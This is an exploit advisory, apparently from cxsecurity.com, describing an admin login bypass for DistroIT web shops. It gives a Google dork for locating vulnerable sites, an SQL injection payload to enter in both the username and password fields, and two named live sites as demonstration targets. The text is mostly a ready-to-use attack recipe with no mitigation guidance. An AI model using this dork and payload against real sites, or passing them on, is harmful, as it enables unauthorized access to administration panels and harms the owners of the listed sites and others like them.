DistroIT Admin Login Bypass

2018.06.17
id 0N3R1D3R (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

*************************************************** # Exploit Title: DistroIT Admin Login Bypass # Google Dork: inurl:/index.html intitle:Admin Tokol DistroIT # Date: 17/06/2018 # Author: 0N3R1D3R # Team: Error Violence # Tested on: Windows 10 x64 *************************************************** [+] Search the dork in Google [+] Open target [+] Enter username and password with [+] Username: '=''or' [+] Password: '=''or' [+] Vuln? You redirected to dashboard *************************************************** [+] Demo Site [+] http://tokol.niqoweb.com/index.html [+] https://funkiesonline.com/index.html *************************************************** Thanks To Error Violence

References:

Personal research


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top